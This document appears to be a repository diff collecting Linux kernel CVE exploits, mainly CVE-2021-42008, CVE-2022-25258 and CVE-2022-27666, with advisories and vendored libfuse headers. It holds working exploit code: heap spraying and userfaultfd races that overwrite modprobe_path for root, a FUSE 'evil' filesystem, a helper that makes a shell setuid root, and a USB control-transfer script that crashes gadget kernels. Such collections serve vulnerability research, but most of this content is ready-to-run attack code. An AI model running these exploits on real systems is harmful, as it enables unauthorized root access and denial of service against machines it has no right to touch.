int id = ((struct t_args *)arg)->id;
void *page = ((struct t_args *)arg)->page;
debug_printf("[Thread %d] Message buffer allocated at 0x%lx\n", id + 1, page + PAGE_SIZE - 0x10);
alloc_msg_queue_B(id);
memset(page, 0, PAGE_SIZE);
((uint64_t *)(page))[0xff0 / 8] = 1; // msg_msg.m_type = 1
if (msgsnd(qid_B[id], page + PAGE_SIZE - 0x10, 0x1018, 0) < 0)
{
perror("[X] msgsnd");
exit(1);
}
debug_printf("[Thread %d] Message sent!\n", id + 1);
}
// create_message_thread() —— spray 8 msg_msg and msg_msgseg, which hangs at copy_from_user(), to change modprobe_path
void create_message_thread(int id, void *page)
{
struct t_args *args = (struct t_args *)malloc(sizeof(struct t_args));
args->id = id;
args->page = page;
pthread_create(&tid[id + 2], NULL, allocate_msg, (void *)args);
}
void close_queue(int qid)
{
if (msgctl(qid, IPC_RMID, NULL) < 0)
{
perror("[X] msgctl()");
exit(1);
}
}
void waitfor(int n, char *msg)
{
char *symbols[] = { "\\", "|" , "/", "-", NULL };
for (int i = 0; i < n; i++)
{
printf("\r[%s] %s", symbols[i % 4], msg);
fflush(stdout);
sleep(1);
}
puts("\r[+] Timer should be expired ");
fflush(stdout);
}
int main()
{
int ptmx;
uint8_t *payload;
// 0. initialize
// 0-1. run on core0 and prepare modprobe file
assign_to_core(0);
// prepare_exploit();
setup_modprobe_hax();
memcpy(buff2 + 0xfc8, "/tmp/x\00", 7);
// 0-2. prepare userfaultfd
for (int i = 0; i < N_THREADS; i++)
{
mmap(pages[i], PAGE_SIZE*3, PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
ufd[i] = initialize_ufd(pages[i]);
}
// 0-3. prepare faultpage handler threads: copy fake modprobe_path string to faultpage
for (int i = 0; i < N_THREADS; i++)
create_pfh_thread(i, ufd[i], pages[i]);
// 1. construct memory layout
// 1-1. spray 100 shm_file_data in kmalloc-32
puts("[*] Spraying shm_file_data in kmalloc-32...");
for (int i = 0; i < 100; i++)
alloc_shm(shmid[i]);
// 1-2. spray 6 msg_msg in kmalloc-4k and 6 msg_msgseg in kmalloc-32
puts("[*] Spraying messages in kmalloc-4k...");
for (int i = 0; i < N_MSG; i++)
alloc_msg_queue_A(i);
for (int i = 0; i < N_MSG; i++)
send_msg(qid_A[i], 0xfd0+0x18, 1, 'A' + i);
// 1-3. free a msg_msg chunk for sixpack
recv_msg(qid_A[0], 0x1018, 0);
// 2. leak kernel address
// 2-1. construct payload and encode it, trigger the vulnerability
ptmx = init_sixpack();
payload = generate_payload(0);
write(ptmx, payload, LEAK_PAYLOAD_SIZE);
// 2-2. leak init_ipc_ns address and calculate modprobe_path address
puts("[*] Leaking pointers...");
leak_pointer();
if (!modprobe_path)
{
puts("[X] Leak failed, try again!");
goto end;
}
// 2-3. free the corrupted msg_msg, to be taken up by new msg_msg
close_queue(qid_A[valid_qid]);
printf("[+] init_ipc_ns: 0x%lx\n", init_ipc_ns);
printf("[+] modprobe_path: 0x%lx\n", modprobe_path);
// 3. change modprobe_path to "/tmp/x"
// 3-1. spray 8 msg_msg and msg_msgseg, which hangs at copy_from_user(), to change modprobe_path
payload = generate_payload(modprobe_path - 0x8);
for (int i = 0; i < N_THREADS; i++)
create_message_thread(i, pages[i]);
// 3-2. wait sixpack struct to be reset
waitfor(6, "Waiting for resync_tnc callback...");
// 3-3. trigger the vulnerability again to change msg_msg->next
puts("[*] Overwriting modprobe_path...");
write(ptmx, payload, WRITE_PAYLOAD_SIZE);
sleep(1);
// 3-4. open the barrier and change modprobe_path
release_pfh = true;
for (int i = 0; i < N_THREADS; i++)
pthread_join(tid[i + 2], NULL);
for (int i = 0; i < N_THREADS; i++)
munmap(pages[i], PAGE_SIZE*3);
release_pfh = false;
// 4. trigger modprobe
system("/tmp/asd"); // "/tmp/asd 2>/dev/null"
// test if we get root
sleep(2);
system("/tmp/sh");
if (!getpwnam("pwn")) // return passwd struct that matches the username.
{
puts("[X] Exploit failed, try again...");
goto end;
}
puts("[+] We are root!");
system("rm /tmp/asd && rm /tmp/x");
system("su pwn");
end:
puts("[*] Cleaning up...");
for (int i = 0; i < N_MSG; i++)
{
if (modprobe_path && (i == valid_qid))
continue;
close_queue(qid_A[i]);
}
for (int i = 0; i < 100; i++)
destroy_shm(i);
return 0;
}
/*
(1) sixpack->cooked_buf chunk的距离
(1-1)
net_device size: 0x940
sixpack size: 0x270
sixpack->cooked_buf offset: 0x1000 - 0x940 - (0x696-8-6) = 0x38
sixpack->cooked_buf to msg_msg->m_list->prev: 0x696
msg_msg->m_list->prev : 8+6
(1-2)
$ print sizeof(struct net_device)
$ p/x &(*(struct sixpack*)0)->cooked_buf
*/

BIN
cve/linux-kernel/2021/CVE-2021-42008/rootfs.cpio Normal file
View File

Binary file not shown.

10
cve/linux-kernel/2021/CVE-2021-42008/start.sh Normal file
View File

@ -0,0 +1,10 @@
qemu-system-x86_64 \
-m 2048M \
-cpu kvm64,+smep,+smap \
-kernel ./bzImage \
-initrd rootfs.cpio \
-nographic \
-s \
-smp 4,cores=2,threads=2 \
-append "console=ttyS0 quiet kaslr" \
-enable-kvm

21
cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2021-42008
source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008
info:
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
severity: high
description: |
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
scope-of-influence:
Linux 2.1.94~v5.13.12
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42008
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
- https://www.youtube.com/watch?v=d5f9xLK8Vhw
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-42008
cwe-id: CWE-787
cnvd-id:
kve-id:
tags: 协议解码溢出

2
cve/linux-kernel/2022/CVE-2022-0995/README.md
View File

@ -9,4 +9,4 @@ make
./exploit
```
<img src="./poc.png">
![](./poc.png)

129
cve/linux-kernel/2022/CVE-2022-25258/.gitignore vendored Normal file
View File

@ -0,0 +1,129 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
.python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/

88
cve/linux-kernel/2022/CVE-2022-25258/README.md Normal file
View File

@ -0,0 +1,88 @@
# d-os-descriptor
## Summary
The USB Gadget Subsystem includes security issues in the OS descriptor handling
section of composite_setup function (composite.c). Processing of properly
crafted control transfer request messages result in device crash due to null
pointer dereference or memory corruption.
## Description
The OS descriptor handling section of composite_setup for interface recipient
is implemented as follows.
```
case USB_RECIP_INTERFACE:
if (w_index != 0x5 || (w_value >> 8))
break;
interface = w_value & 0xFF;
buf[6] = w_index;
count = count_ext_prop(os_desc_cfg,
interface);
put_unaligned_le16(count, buf + 8);
count = len_ext_prop(os_desc_cfg,
interface);
put_unaligned_le32(count, buf);
value = w_length;
if (w_length > 0x0A) {
value = fill_ext_prop(os_desc_cfg,
interface, buf);
if (value >= 0)
value = min_t(u16, w_length, value);
}
break;
```
The interface variable is derived from w_value and later utilized to index usb_configuration->interface array
in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of
MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's
OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array
past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the
endpoint should be stalled.
In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow
of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len,
14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow
via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low.
Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function
retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved
usb_function pointer is null the endpoint should be stalled.
```
static int count_ext_prop(struct usb_configuration *c, int interface)
{
struct usb_function *f;
int j;
f = c->interface[interface];
for (j = 0; j < f->os_desc_n; ++j) {
struct usb_os_desc *d;
if (interface != f->os_desc_table[j].if_id)
continue;
d = f->os_desc_table[j].os_desc;
if (d && d->ext_compat_id)
return d->ext_prop_count;
}
return 0;
}
```
## Impact
Linux (and Android) devices exposing usb gadgets with OS descriptor support
may be arbitrarily crashed by a malicious host by means of a single control
transfer message.
## CVE
[CVE-2022-25258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25258)
## Patch
A patch addressing the described issue was accepted and is now available in
supported kernel versions. For more information consult the below link.
[USB: gadget: validate interface OS descriptor requests](https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c)

99
cve/linux-kernel/2022/CVE-2022-25258/dos_descriptor.py Normal file
View File

@ -0,0 +1,99 @@
#!/usr/bin/python3
#
# Sample exploit to demonstrate Linux USB gadget
# subsystem's os descriptor handling flaws.
#
# This script requires pyusb.
#
# https://github.com/szymonh
#
import argparse
import usb.core
REQ_GET_DESCRIPTOR = 0x06
def auto_int(val: str) -> int:
'''Convert arbitrary string to integer
Used as argparse type to automatically handle input with
different base - decimal, octal, hex etc.
'''
return int(val, 0)
def parse_args() -> argparse.Namespace:
'''Parse command line arguments
'''
parser = argparse.ArgumentParser(
description='Sample exploit for interface OS descriptor vulnerability'
)
parser.add_argument('-v', '--vid', type=auto_int, required=True,
help='vendor id')
parser.add_argument('-p', '--pid', type=auto_int, required=True,
help='product id')
return parser.parse_args()
def print_request(req_type, req, val, idx, length):
'''Write control transfer request to stdout
'''
print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format(
req_type, req, val, idx, length), end=' ')
def exploit(args: argparse.Namespace) -> None:
'''Attempt exploit the interface OS descriptor
Kernel will crash due to null pointer dereference and access
beyond array boundaries.
'''
usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid)
if usbdev is None:
print('Device not found, verify specified VID and PID')
return
for cfg in usbdev:
for idx in range(cfg.bNumInterfaces):
if usbdev.is_kernel_driver_active(idx):
usbdev.detach_kernel_driver(idx)
usbdev.set_configuration()
data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12)
if not data or len(data) != 0x12:
print('OS descriptors are not supported')
exit(1)
vendor_code = data[16]
print('Vendor code: {0}'.format(vendor_code))
bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE
bRequest = vendor_code # set to vendor code
wValue = 0x00 # upper byte needs to be zero, lower is the interface index
wIndex = 0x05 # needs to be 0x5
payload = 4096 # value larger than 0x0A
# iterate throught the c->interface array and beyond
for val in range(0x00, 0xff):
wValue = val
try:
print_request(bmRequestType, bRequest, wValue, wIndex, payload)
data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload)
print('Read data: {0}'.format(data))
except usb.core.USBError as e:
print(e)
if __name__ == '__main__':
'''Main script
'''
exploit(parse_args())

17
cve/linux-kernel/2022/CVE-2022-27666/README.md Normal file
View File

@ -0,0 +1,17 @@
**漏洞描述:**
这是针对CVE-2022-27666的漏洞该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
**影响版本:**
linux kernel 5.17-rc5
**漏洞危害**
漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。
**参考资料**
代码来自https://github.com/plummm/CVE-2022-27666
参考链接https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15

9
cve/linux-kernel/2022/CVE-2022-27666/compile.sh Executable file
View File

@ -0,0 +1,9 @@
#!/bin/bash
gcc -o get_rooot get_rooot.c -w
gcc -o myshell myshell.c -w
gcc -no-pie -static poc.c fuse_evil.c -I./libfuse libfuse3.a -o poc -masm=intel -pthread -w \
-D EXPAND_LOWER_ORDER -D VERSION_5_30 -D KERNEL_LEAK -D KERNEL_EXP
chmod +x ./download_symbol.sh
./download_symbol.sh

40
cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh Executable file
View File

@ -0,0 +1,40 @@
#! /bin/bash
SYM_PATH=`pwd`"/symbol"
if [ -d ${SYM_PATH} ]; then
echo "symbol downloaded"
exit 0
fi
kernel_version=$(uname -r)
echo "Kernel version : ${kernel_version}"
kernel_pkg_version=$(dpkg -l | grep linux-modules-$(uname -r) | head -1 | awk '{ print $3; }')
echo "Kernel package version : ${kernel_pkg_version}"
pkg_name="linux-modules-${kernel_version}_${kernel_pkg_version}_amd64.deb"
pkg_uri="http://archive.ubuntu.com/ubuntu/pool/main/l/linux/${pkg_name}"
echo "Downloading package linux-modules at ${pkg_uri}"
mkdir -p symbols/${kernel_version}
cd symbols/${kernel_version}
wget ${pkg_uri} -O ${pkg_name}
mkdir -p extract
dpkg -x ${pkg_name} extract/
symbols_file="extract/boot/System.map-${kernel_version}"
if [ ! -f ${symbols_file} ]; then
echo "Failed to extract symbol file. Check download of Ubuntu package"
cd ../../
rm -rf symbols
cd - > /dev/null
exit 1
else
echo "Symbol file found. Cleaning directory..."
mv ${symbols_file} ..
fi
cd - > /dev/null
rm -rf symbols/${kernel_version}
echo "Symbol file : System.map-${kernel_version}"

92
cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c Normal file
View File

@ -0,0 +1,92 @@
#include "fuse_evil.h"
const char *evil_path = "evil";
char *evil_str = "/tmp/get_rooot\x00";
int fuse_pipes[2];
// https://www.maastaar.net/fuse/linux/filesystem/c/2016/05/21/writing-a-simple-filesystem-using-fuse/
int evil_read_pause(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi)
{
// change to modprobe_path
char signal;
size_t len = 0x10000;
if (offset + size > len)
size = len - offset;
memset(evil_buffer + offset, 0x43, size);
char *evil = evil_str;
memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil));
if (offset >= len)
return size;
memcpy(buf, evil_buffer + offset, size);
pause();
return size;
}
int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi)
{
// change to modprobe_path
char signal;
size_t len = 0x10000;
if (offset + size > len)
size = len - offset;
memset(evil_buffer + offset, 0x43, size);
char *evil = evil_str;
memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil));
if (offset >= len)
return size;
memcpy(buf, evil_buffer + offset, size);
read(fuse_pipes[0], &signal, 1);
return size;
}
int evil_getattr(const char *path, struct stat *stbuf,
struct fuse_file_info *fi)
{
int res = 0;
memset(stbuf, 0, sizeof(struct stat));
if (strcmp(path, "/") == 0)
{
stbuf->st_mode = S_IFDIR | 0755;
stbuf->st_nlink = 2;
}
else if (strcmp(path + 1, evil_path) == 0)
{
stbuf->st_mode = S_IFREG | 0444;
stbuf->st_nlink = 1;
stbuf->st_size = 0x1000;
}
else
{
res = -ENOENT;
}
return res;
}
int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi,
enum fuse_readdir_flags flags)
{
if (strcmp(path, "/") != 0)
return -ENOENT;
filler(buf, ".", NULL, 0, 0);
filler(buf, "..", NULL, 0, 0);
filler(buf, evil_path, NULL, 0, 0);
return 0;
}

32
cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h Normal file
View File

@ -0,0 +1,32 @@
#define FUSE_USE_VERSION 34
#define _GNU_SOURCE
#include <sched.h>
#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/syscall.h>
#define MNT_PATH "evil"
extern const char *evil_path;
extern int fuse_pipes[2];
extern char *evil_str;
extern char *evil_buffer;
extern int pause_flag;
int evil_read_pause(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi);
int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi);
int evil_getattr(const char *path, struct stat *stbuf,
struct fuse_file_info *fi);
int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi,
enum fuse_readdir_flags flags);

9
cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c Normal file
View File

@ -0,0 +1,9 @@
#include <stdio.h>
#include <stdlib.h>
int main()
{
system("chown root:root /tmp/myshell");
system("chmod 4755 /tmp/myshell");
system("/usr/bin/touch /tmp/exploited");
}

87
cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h Normal file
View File

@ -0,0 +1,87 @@
/*
CUSE: Character device in Userspace
Copyright (C) 2008-2009 SUSE Linux Products GmbH
Copyright (C) 2008-2009 Tejun Heo <tj@kernel.org>
This program can be distributed under the terms of the GNU LGPLv2.
See the file COPYING.LIB.
Read example/cusexmp.c for usages.
*/
#ifndef CUSE_LOWLEVEL_H_
#define CUSE_LOWLEVEL_H_
#ifndef FUSE_USE_VERSION
#define FUSE_USE_VERSION 29
#endif
#include "fuse_lowlevel.h"
#include <fcntl.h>
#include <sys/types.h>
#include <sys/uio.h>
#ifdef __cplusplus
extern "C" {
#endif
#define CUSE_UNRESTRICTED_IOCTL (1 << 0) /* use unrestricted ioctl */
struct fuse_session;
struct cuse_info {
unsigned dev_major;
unsigned dev_minor;
unsigned dev_info_argc;
const char **dev_info_argv;
unsigned flags;
};
/*
* Most ops behave almost identically to the matching fuse_lowlevel
* ops except that they don't take @ino.
*
* init_done : called after initialization is complete
* read/write : always direct IO, simultaneous operations allowed
* ioctl : might be in unrestricted mode depending on ci->flags
*/
struct cuse_lowlevel_ops {
void (*init) (void *userdata, struct fuse_conn_info *conn);
void (*init_done) (void *userdata);
void (*destroy) (void *userdata);
void (*open) (fuse_req_t req, struct fuse_file_info *fi);
void (*read) (fuse_req_t req, size_t size, off_t off,
struct fuse_file_info *fi);
void (*write) (fuse_req_t req, const char *buf, size_t size, off_t off,
struct fuse_file_info *fi);
void (*flush) (fuse_req_t req, struct fuse_file_info *fi);
void (*release) (fuse_req_t req, struct fuse_file_info *fi);
void (*fsync) (fuse_req_t req, int datasync, struct fuse_file_info *fi);
void (*ioctl) (fuse_req_t req, int cmd, void *arg,
struct fuse_file_info *fi, unsigned int flags,
const void *in_buf, size_t in_bufsz, size_t out_bufsz);
void (*poll) (fuse_req_t req, struct fuse_file_info *fi,
struct fuse_pollhandle *ph);
};
struct fuse_session *cuse_lowlevel_new(struct fuse_args *args,
const struct cuse_info *ci,
const struct cuse_lowlevel_ops *clop,
void *userdata);
struct fuse_session *cuse_lowlevel_setup(int argc, char *argv[],
const struct cuse_info *ci,
const struct cuse_lowlevel_ops *clop,
int *multithreaded, void *userdata);
void cuse_lowlevel_teardown(struct fuse_session *se);
int cuse_lowlevel_main(int argc, char *argv[], const struct cuse_info *ci,
const struct cuse_lowlevel_ops *clop, void *userdata);
#ifdef __cplusplus
}
#endif
#endif /* CUSE_LOWLEVEL_H_ */

1296
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h Normal file
View File

File diff suppressed because it is too large Load Diff

859
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h Normal file
View File

@ -0,0 +1,859 @@
/* FUSE: Filesystem in Userspace
Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>
This program can be distributed under the terms of the GNU LGPLv2.
See the file COPYING.LIB.
*/
/** @file */
#if !defined(FUSE_H_) && !defined(FUSE_LOWLEVEL_H_)
#error "Never include <fuse_common.h> directly; use <fuse.h> or <fuse_lowlevel.h> instead."
#endif
#ifndef FUSE_COMMON_H_
#define FUSE_COMMON_H_
#include "fuse_opt.h"
#include "fuse_log.h"
#include <stdint.h>
#include <sys/types.h>
/** Major version of FUSE library interface */
#define FUSE_MAJOR_VERSION 3
/** Minor version of FUSE library interface */
#define FUSE_MINOR_VERSION 10
#define FUSE_MAKE_VERSION(maj, min) ((maj) * 100 + (min))
#define FUSE_VERSION FUSE_MAKE_VERSION(FUSE_MAJOR_VERSION, FUSE_MINOR_VERSION)
#ifdef __cplusplus
extern "C" {
#endif
/**
* Information about an open file.
*
* File Handles are created by the open, opendir, and create methods and closed
* by the release and releasedir methods. Multiple file handles may be
* concurrently open for the same file. Generally, a client will create one
* file handle per file descriptor, though in some cases multiple file
* descriptors can share a single file handle.
*/
struct fuse_file_info {
/** Open flags. Available in open() and release() */
int flags;
/** In case of a write operation indicates if this was caused
by a delayed write from the page cache. If so, then the
context's pid, uid, and gid fields will not be valid, and
the *fh* value may not match the *fh* value that would
have been sent with the corresponding individual write
requests if write caching had been disabled. */
unsigned int writepage : 1;
/** Can be filled in by open, to use direct I/O on this file. */
unsigned int direct_io : 1;
/** Can be filled in by open. It signals the kernel that any
currently cached file data (ie., data that the filesystem
provided the last time the file was open) need not be
invalidated. Has no effect when set in other contexts (in
particular it does nothing when set by opendir()). */
unsigned int keep_cache : 1;
/** Indicates a flush operation. Set in flush operation, also
maybe set in highlevel lock operation and lowlevel release
operation. */
unsigned int flush : 1;
/** Can be filled in by open, to indicate that the file is not
seekable. */
unsigned int nonseekable : 1;
/* Indicates that flock locks for this file should be
released. If set, lock_owner shall contain a valid value.
May only be set in ->release(). */
unsigned int flock_release : 1;
/** Can be filled in by opendir. It signals the kernel to
enable caching of entries returned by readdir(). Has no
effect when set in other contexts (in particular it does
nothing when set by open()). */
unsigned int cache_readdir : 1;
/** Padding. Reserved for future use*/
unsigned int padding : 25;
unsigned int padding2 : 32;
/** File handle id. May be filled in by filesystem in create,
* open, and opendir(). Available in most other file operations on the
* same file handle. */
uint64_t fh;
/** Lock owner id. Available in locking operations and flush */
uint64_t lock_owner;
/** Requested poll events. Available in ->poll. Only set on kernels
which support it. If unsupported, this field is set to zero. */
uint32_t poll_events;
};
/**
* Configuration parameters passed to fuse_session_loop_mt() and
* fuse_loop_mt().
*/
struct fuse_loop_config {
/**
* whether to use separate device fds for each thread
* (may increase performance)
*/
int clone_fd;
/**
* The maximum number of available worker threads before they
* start to get deleted when they become idle. If not
* specified, the default is 10.
*
* Adjusting this has performance implications; a very small number
* of threads in the pool will cause a lot of thread creation and
* deletion overhead and performance may suffer. When set to 0, a new
* thread will be created to service every operation.
*/
unsigned int max_idle_threads;
};
/**************************************************************************
* Capability bits for 'fuse_conn_info.capable' and 'fuse_conn_info.want' *
**************************************************************************/
/**
* Indicates that the filesystem supports asynchronous read requests.
*
* If this capability is not requested/available, the kernel will
* ensure that there is at most one pending read request per
* file-handle at any time, and will attempt to order read requests by
* increasing offset.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_ASYNC_READ (1 << 0)
/**
* Indicates that the filesystem supports "remote" locking.
*
* This feature is enabled by default when supported by the kernel,
* and if getlk() and setlk() handlers are implemented.
*/
#define FUSE_CAP_POSIX_LOCKS (1 << 1)
/**
* Indicates that the filesystem supports the O_TRUNC open flag. If
* disabled, and an application specifies O_TRUNC, fuse first calls
* truncate() and then open() with O_TRUNC filtered out.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_ATOMIC_O_TRUNC (1 << 3)
/**
* Indicates that the filesystem supports lookups of "." and "..".
*
* This feature is disabled by default.
*/
#define FUSE_CAP_EXPORT_SUPPORT (1 << 4)
/**
* Indicates that the kernel should not apply the umask to the
* file mode on create operations.
*
* This feature is disabled by default.
*/
#define FUSE_CAP_DONT_MASK (1 << 6)
/**
* Indicates that libfuse should try to use splice() when writing to
* the fuse device. This may improve performance.
*
* This feature is disabled by default.
*/
#define FUSE_CAP_SPLICE_WRITE (1 << 7)
/**
* Indicates that libfuse should try to move pages instead of copying when
* writing to / reading from the fuse device. This may improve performance.
*
* This feature is disabled by default.
*/
#define FUSE_CAP_SPLICE_MOVE (1 << 8)
/**
* Indicates that libfuse should try to use splice() when reading from
* the fuse device. This may improve performance.
*
* This feature is enabled by default when supported by the kernel and
* if the filesystem implements a write_buf() handler.
*/
#define FUSE_CAP_SPLICE_READ (1 << 9)
/**
* If set, the calls to flock(2) will be emulated using POSIX locks and must
* then be handled by the filesystem's setlock() handler.
*
* If not set, flock(2) calls will be handled by the FUSE kernel module
* internally (so any access that does not go through the kernel cannot be taken
* into account).
*
* This feature is enabled by default when supported by the kernel and
* if the filesystem implements a flock() handler.
*/
#define FUSE_CAP_FLOCK_LOCKS (1 << 10)
/**
* Indicates that the filesystem supports ioctl's on directories.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_IOCTL_DIR (1 << 11)
/**
* Traditionally, while a file is open the FUSE kernel module only
* asks the filesystem for an update of the file's attributes when a
* client attempts to read beyond EOF. This is unsuitable for
* e.g. network filesystems, where the file contents may change
* without the kernel knowing about it.
*
* If this flag is set, FUSE will check the validity of the attributes
* on every read. If the attributes are no longer valid (i.e., if the
* *attr_timeout* passed to fuse_reply_attr() or set in `struct
* fuse_entry_param` has passed), it will first issue a `getattr`
* request. If the new mtime differs from the previous value, any
* cached file *contents* will be invalidated as well.
*
* This flag should always be set when available. If all file changes
* go through the kernel, *attr_timeout* should be set to a very large
* number to avoid unnecessary getattr() calls.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_AUTO_INVAL_DATA (1 << 12)
/**
* Indicates that the filesystem supports readdirplus.
*
* This feature is enabled by default when supported by the kernel and if the
* filesystem implements a readdirplus() handler.
*/
#define FUSE_CAP_READDIRPLUS (1 << 13)
/**
* Indicates that the filesystem supports adaptive readdirplus.
*
* If FUSE_CAP_READDIRPLUS is not set, this flag has no effect.
*
* If FUSE_CAP_READDIRPLUS is set and this flag is not set, the kernel
* will always issue readdirplus() requests to retrieve directory
* contents.
*
* If FUSE_CAP_READDIRPLUS is set and this flag is set, the kernel
* will issue both readdir() and readdirplus() requests, depending on
* how much information is expected to be required.
*
* As of Linux 4.20, the algorithm is as follows: when userspace
* starts to read directory entries, issue a READDIRPLUS request to
* the filesystem. If any entry attributes have been looked up by the
* time userspace requests the next batch of entries continue with
* READDIRPLUS, otherwise switch to plain READDIR. This will reasult
* in eg plain "ls" triggering READDIRPLUS first then READDIR after
* that because it doesn't do lookups. "ls -l" should result in all
* READDIRPLUS, except if dentries are already cached.
*
* This feature is enabled by default when supported by the kernel and
* if the filesystem implements both a readdirplus() and a readdir()
* handler.
*/
#define FUSE_CAP_READDIRPLUS_AUTO (1 << 14)
/**
* Indicates that the filesystem supports asynchronous direct I/O submission.
*
* If this capability is not requested/available, the kernel will ensure that
* there is at most one pending read and one pending write request per direct
* I/O file-handle at any time.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_ASYNC_DIO (1 << 15)
/**
* Indicates that writeback caching should be enabled. This means that
* individual write request may be buffered and merged in the kernel
* before they are send to the filesystem.
*
* This feature is disabled by default.
*/
#define FUSE_CAP_WRITEBACK_CACHE (1 << 16)
/**
* Indicates support for zero-message opens. If this flag is set in
* the `capable` field of the `fuse_conn_info` structure, then the
* filesystem may return `ENOSYS` from the open() handler to indicate
* success. Further attempts to open files will be handled in the
* kernel. (If this flag is not set, returning ENOSYS will be treated
* as an error and signaled to the caller).
*
* Setting (or unsetting) this flag in the `want` field has *no
* effect*.
*/
#define FUSE_CAP_NO_OPEN_SUPPORT (1 << 17)
/**
* Indicates support for parallel directory operations. If this flag
* is unset, the FUSE kernel module will ensure that lookup() and
* readdir() requests are never issued concurrently for the same
* directory.
*
* This feature is enabled by default when supported by the kernel.
*/
#define FUSE_CAP_PARALLEL_DIROPS (1 << 18)
/**
* Indicates support for POSIX ACLs.
*
* If this feature is enabled, the kernel will cache and have
* responsibility for enforcing ACLs. ACL will be stored as xattrs and
* passed to userspace, which is responsible for updating the ACLs in
* the filesystem, keeping the file mode in sync with the ACL, and
